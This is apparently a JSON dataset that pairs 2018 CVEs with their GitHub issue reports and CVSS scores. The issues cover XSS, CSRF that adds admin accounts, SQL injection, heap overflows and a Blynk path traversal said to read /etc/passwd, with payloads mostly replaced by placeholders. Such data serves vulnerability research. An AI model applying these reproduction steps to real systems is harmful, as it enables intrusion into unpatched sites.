  26392. {
  26393. "CVE_ID": "CVE-2018-17425",
  26394. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/153",
  26395. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/153",
  26396. "Repo_new": "wuzhicms/wuzhicms",
  26397. "Issue_Created_At": "2018-09-19T03:16:02Z",
  26398. "description": "Front end user login Membership Center I want to ask detailed description > storage XSS vulnerabilities found in the system Bulletin. Front end user login Membership Center I want to ask detailed description > storage XSS vulnerabilities found in the system Bulletin poc xss payload: APITAG Steps to Reproduce URLTAG FILETAG FILETAG FILETAG",
  26399. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26400. "severity": "MEDIUM",
  26401. "baseScore": 5.4,
  26402. "impactScore": 2.7,
  26403. "exploitabilityScore": 2.3
  26404. },
  26405. {
  26406. "CVE_ID": "CVE-2018-17426",
  26407. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/154",
  26408. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/154",
  26409. "Repo_new": "wuzhicms/wuzhicms",
  26410. "Issue_Created_At": "2018-09-19T05:16:06Z",
  26411. "description": "WUZHI CMS NUMBERTAG There is a a Stored XSS . WUZHI CMS NUMBERTAG There is a a Stored XSS Extension module SMS in station POC APITAG FILETAG FILETAG FILETAG",
  26412. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26413. "severity": "MEDIUM",
  26414. "baseScore": 5.4,
  26415. "impactScore": 2.7,
  26416. "exploitabilityScore": 2.3
  26417. },
  26418. {
  26419. "CVE_ID": "CVE-2018-17427",
  26420. "Issue_Url_old": "https://github.com/lemire/simdcomp/issues/21",
  26421. "Issue_Url_new": "https://github.com/lemire/simdcomp/issues/21",
  26422. "Repo_new": "lemire/simdcomp",
  26423. "Issue_Created_At": "2018-09-19T05:38:33Z",
  26424. "description": "heap buffer overflow (detected by APITAG Here is my function APITAG : FILETAG sizeof in is NUMBERTAG packing unpacking APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG at pc NUMBERTAG a NUMBERTAG bp NUMBERTAG ffe5a NUMBERTAG c NUMBERTAG sp NUMBERTAG ffe5a NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG eac7 ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG f ( PATHTAG NUMBERTAG d5c ( PATHTAG NUMBERTAG cc NUMBERTAG PATHTAG NUMBERTAG f1c2cf NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG cc NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG b0 ( PATHTAG NUMBERTAG aaeb ( PATHTAG NUMBERTAG eac7 ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG f ( PATHTAG NUMBERTAG d5c ( PATHTAG NUMBERTAG cc NUMBERTAG PATHTAG NUMBERTAG f1c2cf NUMBERTAG b NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow ( PATHTAG ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a NUMBERTAG fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING MS NUMBERTAG APITAG APITAG ; base unit: APITAG APITAG PATHTAG ) PATHTAG ) artifact_prefix='./'; Test unit written to ./crash APITAG Base NUMBERTAG PATHTAG",
  26425. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26426. "severity": "MEDIUM",
  26427. "baseScore": 6.5,
  26428. "impactScore": 3.6,
  26429. "exploitabilityScore": 2.8
  26430. },
  26431. {
  26432. "CVE_ID": "CVE-2018-17429",
  26433. "Issue_Url_old": "https://github.com/jetiben/jtbc/issues/4",
  26434. "Issue_Url_new": "https://github.com/jetiben/jtbc/issues/4",
  26435. "Repo_new": "jetiben/jtbc",
  26436. "Issue_Created_At": "2018-09-18T08:08:14Z",
  26437. "description": "There is CSRF vulnerability that can add the administrator account. PATHTAG in JTBC NUMBERTAG C) has APITAG the administrator logged in, open the csrf exp page,will be add a administrator. csrf exp: FILETAG CODETAG",
  26438. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26439. "severity": "HIGH",
  26440. "baseScore": 8.8,
  26441. "impactScore": 5.9,
  26442. "exploitabilityScore": 2.8
  26443. },
  26444. {
  26445. "CVE_ID": "CVE-2018-17556",
  26446. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14094",
  26447. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14094",
  26448. "Repo_new": "modxcms/revolution",
  26449. "Issue_Created_At": "2018-09-26T06:04:30Z",
  26450. "description": "Stored XSS. Stored XSS: The application is vulnerable to stored XSS. Step to reproduce NUMBERTAG Under Media APITAG sources choose Create New Media source and enter the Xss Payload APITAG in the Name field and click on save NUMBERTAG The application renders the entered script and displays a pop up whenever the page is being visited by the user. Observed behavior The application processes the html tags or scripts and it is getting stored in the database. Expected behavior It should not accept any scripts or html tags. Environment MODX version:MODX Revolution NUMBERTAG pl",
  26451. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26452. "severity": "MEDIUM",
  26453. "baseScore": 5.4,
  26454. "impactScore": 2.7,
  26455. "exploitabilityScore": 2.3
  26456. },
  26457. {
  26458. "CVE_ID": "CVE-2018-17566",
  26459. "Issue_Url_old": "https://github.com/top-think/think/issues/858",
  26460. "Issue_Url_new": "https://github.com/top-think/think/issues/858",
  26461. "Repo_new": "top-think/think",
  26462. "Issue_Created_At": "2018-09-26T09:32:14Z",
  26463. "description": "Thinkphp NUMBERTAG delete\u51fd\u6570\u8bbe\u8ba1\u7f3a\u9677\u5efa\u8bae\u4fee\u6539. APITAG FILETAG APITAG FILETAG",
  26464. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26465. "severity": "CRITICAL",
  26466. "baseScore": 9.8,
  26467. "impactScore": 5.9,
  26468. "exploitabilityScore": 3.9
  26469. },
  26470. {
  26471. "CVE_ID": "CVE-2018-17574",
  26472. "Issue_Url_old": "https://github.com/YMFE/yapi/issues/520",
  26473. "Issue_Url_new": "https://github.com/ymfe/yapi/issues/520",
  26474. "Repo_new": "ymfe/yapi",
  26475. "Issue_Created_At": "2018-08-31T07:57:46Z",
  26476. "description": "Stored XSS in Project Name. Version NUMBERTAG Problem ~ Stored XSS in Project Name NUMBERTAG Register a account in the demo domain FILETAG Then new a project: FILETAG NUMBERTAG When the someone including the managers & administrators views the operation dynamics of the project, malicious js code will execute. FILETAG \u4ec0\u4e48\u6d4f\u89c8\u5668 ~ chrome APITAG Windows, APITAG ~ Linux",
  26477. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26478. "severity": "MEDIUM",
  26479. "baseScore": 5.4,
  26480. "impactScore": 2.7,
  26481. "exploitabilityScore": 2.3
  26482. },
  26483. {
  26484. "CVE_ID": "CVE-2018-17580",
  26485. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/485",
  26486. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/485",
  26487. "Repo_new": "appneta/tcpreplay",
  26488. "Issue_Created_At": "2018-09-25T11:06:23Z",
  26489. "description": "Heap Overflow in APITAG There exists a heap buffer overflow in function APITAG in the file APITAG of tcpreplay NUMBERTAG The issue can be reproduced when provided with an crafted pcap file as an input to the tcpreplay binary. Affected version NUMBERTAG branch Command : sudo tcpreplay i eno1 t K loop NUMBERTAG unique ip $POC Debugging CODETAG APITAG ASAN output ERRORTAG glibc detection ERRORTAG Reproducer File URLTAG",
  26490. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  26491. "severity": "HIGH",
  26492. "baseScore": 7.1,
  26493. "impactScore": 5.2,
  26494. "exploitabilityScore": 1.8
  26495. },
  26496. {
  26497. "CVE_ID": "CVE-2018-17581",
  26498. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/460",
  26499. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/460",
  26500. "Repo_new": "exiv2/exiv2",
  26501. "Issue_Created_At": "2018-09-25T16:06:25Z",
  26502. "description": "Stack overflow due to excessive stack consumption APITAG function). A stack overflow exits in APITAG at APITAG due to a recursive function call causing the excessive stack consumption which leads to Denial of service. Affected version: exi NUMBERTAG bit build) Command: ./exi NUMBERTAG pi $POC Debugging CODETAG ASAN Output ERRORTAG",
  26503. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26504. "severity": "MEDIUM",
  26505. "baseScore": 6.5,
  26506. "impactScore": 3.6,
  26507. "exploitabilityScore": 2.8
  26508. },
  26509. {
  26510. "CVE_ID": "CVE-2018-17582",
  26511. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/484",
  26512. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/484",
  26513. "Repo_new": "appneta/tcpreplay",
  26514. "Issue_Created_At": "2018-09-24T14:33:44Z",
  26515. "description": "Heap overflow in APITAG tcpreplay contains a heap based buffer overflow vulnerability. The APITAG function in the APITAG file uses the APITAG function to copy sequences from the source buffer pktdata to the destination APITAG . However, there are no checks in place to ensure that dst is a non zero value. An attacker can exploit this vulnerability by submitting a malicious file that exploits this issue. This will result in a Denial of Service APITAG and potentially Information Exposure when the application attempts to process the file. Affected version NUMBERTAG branch Command : sudo tcpreplay i eno1 t K loop NUMBERTAG unique ip $POC Debugging CODETAG CODETAG ERRORTAG CODETAG ASAN output ERRORTAG Valgrind report CODETAG Please check if you are able to reproduce the issue via the Reproducer file URLTAG",
  26516. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  26517. "severity": "HIGH",
  26518. "baseScore": 7.1,
  26519. "impactScore": 5.2,
  26520. "exploitabilityScore": 1.8
  26521. },
  26522. {
  26523. "CVE_ID": "CVE-2018-17785",
  26524. "Issue_Url_old": "https://github.com/blynkkk/blynk-server/issues/1256",
  26525. "Issue_Url_new": "https://github.com/blynkkk/blynk-server/issues/1256",
  26526. "Repo_new": "blynkkk/blynk-server",
  26527. "Issue_Created_At": "2018-09-30T05:56:51Z",
  26528. "description": "Path operation vulnerability NUMBERTAG normal boot software eg\uff1a java jar FILETAG APITAG Blynk/ APITAG paths and grab packets Modify HTTP request packet eg NUMBERTAG GET PATHTAG HTTP NUMBERTAG Host: APITAG Connection: Keep alive Accept Encoding: gzip,deflate User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: / eg NUMBERTAG GET PATHTAG HTTP NUMBERTAG Host: APITAG Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Referer: URLTAG Cookie: session=f NUMBERTAG e NUMBERTAG f NUMBERTAG b NUMBERTAG b You can access /etc/passwd. FILETAG FILETAG FILETAG Thank you very much \uff01",
  26529. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  26530. "severity": "HIGH",
  26531. "baseScore": 7.5,
  26532. "impactScore": 3.6,
  26533. "exploitabilityScore": 3.9
  26534. },
  26535. {
  26536. "CVE_ID": "CVE-2018-17796",
  26537. "Issue_Url_old": "https://github.com/wuweiit/mushroom/issues/16",
  26538. "Issue_Url_new": "https://github.com/wuweiit/mushroom/issues/16",
  26539. "Repo_new": "wuweiit/mushroom",
  26540. "Issue_Created_At": "2018-09-21T06:30:41Z",
  26541. "description": "SQL injection vulnerability was discovered in MRCMS. Hi all, There are a SQL injection vulnerability found by Qihoo NUMBERTAG APITAG Team. Details as bellow: The APITAG method in the APITAG java file is used directly to hash and run SQL statements without filtering parameters, resulting in SQL injection\u3002 FILETAG Continuous tracing can be found that the APITAG method is invoked in APITAG FILETAG View APITAG () method FILETAG When param is empty (that is the first time), a param will be constructed \uff0c view the constructor. FILETAG You can see that all attributes in APITAG are obtained from request and are controlled by attackers.",
  26542. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26543. "severity": "CRITICAL",
  26544. "baseScore": 9.8,
  26545. "impactScore": 5.9,
  26546. "exploitabilityScore": 3.9
  26547. },
  26548. {
  26549. "CVE_ID": "CVE-2018-17825",
  26550. "Issue_Url_old": "https://github.com/adplug/adplug/issues/67",
  26551. "Issue_Url_new": "https://github.com/adplug/adplug/issues/67",
  26552. "Repo_new": "adplug/adplug",
  26553. "Issue_Created_At": "2018-09-04T02:57:54Z",
  26554. "description": "double free in APITAG There are several suspected double free bugs ( CVETAG with APITAG in APITAG This destructor calls APITAG and APITAG in succession. As defined in fmopl.c, however, APITAG OPL) calls APITAG which invokes APITAG APITAG frees the four global pointers TL_TABLE, SIN_TABLE, AMS_TABLE, VIB_TABLE by simply using the APITAG method. Therefore, the two successive calls of APITAG in APITAG are likely to cause double frees of the four pointers. One possible fix could be directly assigning each pointer to NULL after calling APITAG",
  26555. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26556. "severity": "CRITICAL",
  26557. "baseScore": 9.8,
  26558. "impactScore": 5.9,
  26559. "exploitabilityScore": 3.9
  26560. },
  26561. {
  26562. "CVE_ID": "CVE-2018-17828",
  26563. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/62",
  26564. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/62",
  26565. "Repo_new": "gdraheim/zziplib",
  26566. "Issue_Created_At": "2018-09-25T13:32:45Z",
  26567. "description": "Directory traversal vulnerability in zziplib NUMBERTAG Directory traversal vulnerability in zziplib NUMBERTAG allows attackers to overwrite arbitrary files via a .. (dot dot) in an zip file. $unzzip mem FILETAG FILETAG Relevant code in function unzzip_cat in Unzzipcat mem.c: static int unzzip_cat (int argc, char argv, int extract) { ...... if (argc NUMBERTAG print directory list / ZZIP_MEM_ENTRY entry = APITAG DBG2(\"findfirst %p \", entry); for (; entry ; entry = zzip_mem_disk_findnext(disk, entry)) { char name = zzip_mem_entry_to_name (entry); FILE out = stdout; if (extract) out = create_fopen(name, \"wb NUMBERTAG no checkout here if (! out) { if (errno != EISDIR) { DBG3(\"can not open output file %i %s\", errno, strerror(errno)); done = EXIT_ERRORS; } continue; } unzzip_mem_disk_cat_file (disk, name, out); if (extract) fclose(out); } } ...... } static void APITAG disk, char name, FILE out) { ZZIP_DISK_FILE file = zzip_mem_disk_fopen (disk, name); if (file) { char buffer NUMBERTAG int len; while ((len = zzip_mem_disk_fread (buffer NUMBERTAG file))) { fwrite (buffer NUMBERTAG len, out); } zzip_mem_disk_fclose (file); } }",
  26568. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  26569. "severity": "MEDIUM",
  26570. "baseScore": 5.5,
  26571. "impactScore": 3.6,
  26572. "exploitabilityScore": 1.8
  26573. },
  26574. {
  26575. "CVE_ID": "CVE-2018-17830",
  26576. "Issue_Url_old": "https://github.com/redaxo/redaxo4/issues/421",
  26577. "Issue_Url_new": "https://github.com/redaxo/redaxo4/issues/421",
  26578. "Repo_new": "redaxo/redaxo4",
  26579. "Issue_Created_At": "2018-09-25T07:31:11Z",
  26580. "description": "Reflected Cross site scripting (XSS) vulnerability in REDAXO NUMBERTAG details in PATHTAG ERRORTAG It is worth noting that the value of $args here is introduced from the HTTP request. And the value is an array. Then the $args is processed by foreach. The program uses the htmlspecialchars function to process $arg_value, but does not handle $arg_name.So an attacker can insert an attack payload at $arg_name to cause XSS. POC The user directly accesses the URL if the user has logged in. URLTAG FILETAG Credit: APITAG of APITAG",
  26581. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26582. "severity": "MEDIUM",
  26583. "baseScore": 5.4,
  26584. "impactScore": 2.7,
  26585. "exploitabilityScore": 2.3
  26586. },
  26587. {
  26588. "CVE_ID": "CVE-2018-17831",
  26589. "Issue_Url_old": "https://github.com/redaxo/redaxo/issues/2043",
  26590. "Issue_Url_new": "https://github.com/redaxo/redaxo/issues/2043",
  26591. "Repo_new": "redaxo/redaxo",
  26592. "Issue_Created_At": "2018-09-26T05:41:03Z",
  26593. "description": "Sql Injection in Redaxo NUMBERTAG details in PATHTAG ERRORTAG Called the APITAG APITAG the function in PATHTAG ERRORTAG When the if condition is true, the function returns the value of the sort parameter obtained from the HTTP request. Go back to the APITAG function above. CODETAG When the value of APITAG is not empty, APITAG is directly spliced into the SQL statement. Caused SQL injection. Since this file APITAG is used by many functions in this system. So there are a lot of SQL injections. FILETAG At this point the URL becomes URLTAG Change the URL as follows: URLTAG APITAG APITAG Then visit the URL and you will see a response delay of NUMBERTAG s APITAG FILETAG The complete SQL statement executed is CODETAG Credit: APITAG of APITAG",
  26594. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26595. "severity": "CRITICAL",
  26596. "baseScore": 9.8,
  26597. "impactScore": 5.9,
  26598. "exploitabilityScore": 3.9
  26599. },
  26600. {
  26601. "CVE_ID": "CVE-2018-17835",
  26602. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1298",
  26603. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1298",
  26604. "Repo_new": "getsimplecms/getsimplecms",
  26605. "Issue_Created_At": "2018-09-28T04:08:28Z",
  26606. "description": "Insert Stored XSS in FILETAG . Type of vulnerability: Stored XSS Discovered by: iso NUMBERTAG Description: Stored XSS attack is one of the three major categories of XSS attacks, the others being Non Persistent (or Reflected) XSS and DOM based XSS. Step to reproduce the vulnerability: APITAG the CMS. APITAG Page FILETAG APITAG XSS payload (\"> APITAG <\") in the APITAG Permalink Structure\" parameter and click on APITAG Setting\". FILETAG APITAG Page FILETAG APITAG \"www\" in the title and body , click on \"save page\" to publish the page. FILETAG APITAG , as shown in the figure. FILETAG APITAG the page FILETAG FILETAG",
  26607. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  26608. "severity": "MEDIUM",
  26609. "baseScore": 4.8,
  26610. "impactScore": 2.7,
  26611. "exploitabilityScore": 1.7
  26612. },
  26613. {
  26614. "CVE_ID": "CVE-2018-17847",
  26615. "Issue_Url_old": "https://github.com/golang/go/issues/27846",
  26616. "Issue_Url_new": "https://github.com/golang/go/issues/27846",
  26617. "Repo_new": "golang/go",
  26618. "Issue_Created_At": "2018-09-25T08:05:30Z",
  26619. "description": "PATHTAG panic: runtime error: index out of range. Please answer these questions before submitting your issue. Thanks! What version of Go are you using ( go version )? APITAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? CODETAG What did you do? CODETAG What did you expect to see? No panic exit What did you see instead? ERRORTAG",
  26620. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  26621. "severity": "HIGH",
  26622. "baseScore": 7.5,
  26623. "impactScore": 3.6,
  26624. "exploitabilityScore": 3.9
  26625. },
  26626. {
  26627. "CVE_ID": "CVE-2018-17965",
  26628. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1052",
  26629. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1052",
  26630. "Repo_new": "imagemagick/imagemagick",
  26631. "Issue_Created_At": "2018-03-24T16:32:42Z",
  26632. "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
  26633. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26634. "severity": "MEDIUM",
  26635. "baseScore": 6.5,
  26636. "impactScore": 3.6,
  26637. "exploitabilityScore": 2.8
  26638. },
  26639. {
  26640. "CVE_ID": "CVE-2018-17966",
  26641. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1050",
  26642. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1050",
  26643. "Repo_new": "imagemagick/imagemagick",
  26644. "Issue_Created_At": "2018-03-24T16:31:46Z",
  26645. "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
  26646. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26647. "severity": "MEDIUM",
  26648. "baseScore": 6.5,
  26649. "impactScore": 3.6,
  26650. "exploitabilityScore": 2.8
  26651. },
  26652. {
  26653. "CVE_ID": "CVE-2018-17967",
  26654. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1051",
  26655. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1051",
  26656. "Repo_new": "imagemagick/imagemagick",
  26657. "Issue_Created_At": "2018-03-24T16:32:17Z",
  26658. "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
  26659. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26660. "severity": "MEDIUM",
  26661. "baseScore": 6.5,
  26662. "impactScore": 3.6,
  26663. "exploitabilityScore": 2.8
  26664. },
  26665. {
  26666. "CVE_ID": "CVE-2018-17974",
  26667. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/486",
  26668. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/486",
  26669. "Repo_new": "appneta/tcpreplay",
  26670. "Issue_Created_At": "2018-10-03T16:37:25Z",
  26671. "description": "Heap overflow in APITAG . An heap overflow was triggered in function APITAG at file APITAG , due to inappropriate values in the function APITAG The length (pktlen + ctx > l2len) is larger than source value (packet + ctx >l2len) as the function failed to ensure the length of a packet is valid, causing segmentation fault. Affected version NUMBERTAG branch Command : sudo tcpreplay edit APITAG intf1=ens NUMBERTAG intf2=lo enet vlan=add enet vlan tag NUMBERTAG POC Debugging: ERRORTAG CODETAG ERRORTAG ASAN output ERRORTAG Please check if you are able to reproduce the issue via the Reproducer file URLTAG",
  26672. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26673. "severity": "MEDIUM",
  26674. "baseScore": 5.5,
  26675. "impactScore": 3.6,
  26676. "exploitabilityScore": 1.8
  26677. },
  26678. {
  26679. "CVE_ID": "CVE-2018-17986",
  26680. "Issue_Url_old": "https://github.com/smiffy6969/razorCMS/issues/53",
  26681. "Issue_Url_new": "https://github.com/smiffy6969/razorcms/issues/53",
  26682. "Repo_new": "smiffy6969/razorCMS",
  26683. "Issue_Created_At": "2018-09-06T07:37:06Z",
  26684. "description": "CSRF Vulnerability. APITAG version NUMBERTAG Operating System Used: Microsoft Windows NUMBERTAG ulnerability Type: Cross Site Request Forgery(CSRF) Severity: High Vulnerability Description: CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the targeted end user is a normal user, a successful CSRF attack can compromise sensitive data. If the targeted end user is the administrator account, this type of attack can compromise the entire web application. STEPS TO REPRODUCE NUMBERTAG Log in to the Administrator user account. Crafted Code: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG Run the above code which changes the password of admin user to \"test APITAG NUMBERTAG After submitting the code the password is successfully changed.",
  26685. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26686. "severity": "HIGH",
  26687. "baseScore": 8.8,
  26688. "impactScore": 5.9,
  26689. "exploitabilityScore": 2.8
  26690. },
  26691. {
  26692. "CVE_ID": "CVE-2018-17988",
  26693. "Issue_Url_old": "https://github.com/AndyRixon/LayerBB/issues/51",
  26694. "Issue_Url_new": "https://github.com/andyrixon/layerbb/issues/51",
  26695. "Repo_new": "andyrixon/layerbb",
  26696. "Issue_Created_At": "2019-10-10T14:13:40Z",
  26697. "description": "SQL injection vulnerability. APITAG NUMBERTAG has SQL Injection via the FILETAG search_query parameter. Steps to Reproduce Issue in FILETAG NUMBERTAG CODETAG Unfiltered search_query results in SQL injection POC Packet parameters CODETAG Server Environment (PHP, APITAG Apache Version and Operating System): version NUMBERTAG",
  26698. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26699. "severity": "CRITICAL",
  26700. "baseScore": 9.8,
  26701. "impactScore": 5.9,
  26702. "exploitabilityScore": 3.9
  26703. },
  26704. {
  26705. "CVE_ID": "CVE-2018-17996",
  26706. "Issue_Url_old": "https://github.com/AndyRixon/LayerBB/issues/38",
  26707. "Issue_Url_new": "https://github.com/andyrixon/layerbb/issues/38",
  26708. "Repo_new": "AndyRixon/LayerBB",
  26709. "Issue_Created_At": "2019-02-28T07:00:14Z",
  26710. "description": "APITAG NUMBERTAG CSRF Vulnerability APITAG Users). Vulnerability analysis APITAG added csrf_token to post request to prevent csrf vulnerability; at the time, get request was not prevented; there was still a csrf vulnerability that could be exploited. In the FILETAG file, the delete user is requested by get. FILETAG POC When the administrator accesses the following url, the account with id NUMBERTAG will be deleted. APITAG",
  26711. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  26712. "severity": "MEDIUM",
  26713. "baseScore": 6.5,
  26714. "impactScore": 3.6,
  26715. "exploitabilityScore": 2.8
  26716. },
  26717. {
  26718. "CVE_ID": "CVE-2018-18016",
  26719. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1049",
  26720. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1049",
  26721. "Repo_new": "imagemagick/imagemagick",
  26722. "Issue_Created_At": "2018-03-24T16:31:24Z",
  26723. "description": "Memory leak in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG Steps to Reproduce ERRORTAG ERRORTAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Credit: APITAG of Venustech",
  26724. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26725. "severity": "MEDIUM",
  26726. "baseScore": 6.5,
  26727. "impactScore": 3.6,
  26728. "exploitabilityScore": 2.8
  26729. },
  26730. {
  26731. "CVE_ID": "CVE-2018-18020",
  26732. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/243",
  26733. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/243",
  26734. "Repo_new": "qpdf/qpdf",
  26735. "Issue_Created_At": "2018-10-06T08:50:15Z",
